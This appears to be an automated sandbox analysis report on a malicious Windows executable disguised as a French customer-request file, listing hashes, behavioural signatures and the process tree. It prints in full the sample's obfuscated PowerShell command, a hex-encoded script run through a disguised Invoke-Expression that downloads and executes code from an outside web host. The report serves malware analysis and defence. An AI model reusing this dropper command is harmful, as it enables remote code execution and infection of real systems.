Analysis
- max time kernel: 13s
- max time network: 126s
- platform: windows10_x64
- resource: win10
- submitted: 31-07-2020 10:56
Static task: static1
Behavioral task: behavioral1
- Sample: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
- Resource: win10
General
- Target: Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
- Size: 19KB
- MD5: 36117a183609bb6953d3f78bb45ee5b9
- SHA1: 0d89d56bac5838a3f0854e43b42e564d290f4935
- SHA256: 3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1
- SHA512: 79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2
Malware Config
Signatures
- Blacklisted process makes network request (1 IoC)
  Processes (flow | pid | process): 3 | 2020 | Powershell.exe
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process): Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2020 | 3928 | Powershell.exe | (empty)
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  Processes (description | pid | process): every entry is for pid 2020, Powershell.exe; the tokens, in the order recorded, are:
  Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid | process): 2020 | Powershell.exe; 2020 | Powershell.exe; 2020 | Powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
  The command line splits a caret-delimited string of hex byte values, converts each value to a character, and pipes the joined text to Invoke-Expression (written as I`E`X to evade simple string matching), so the script that actually runs is only visible after decoding.
  Signatures:
  - Blacklisted process makes network request
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses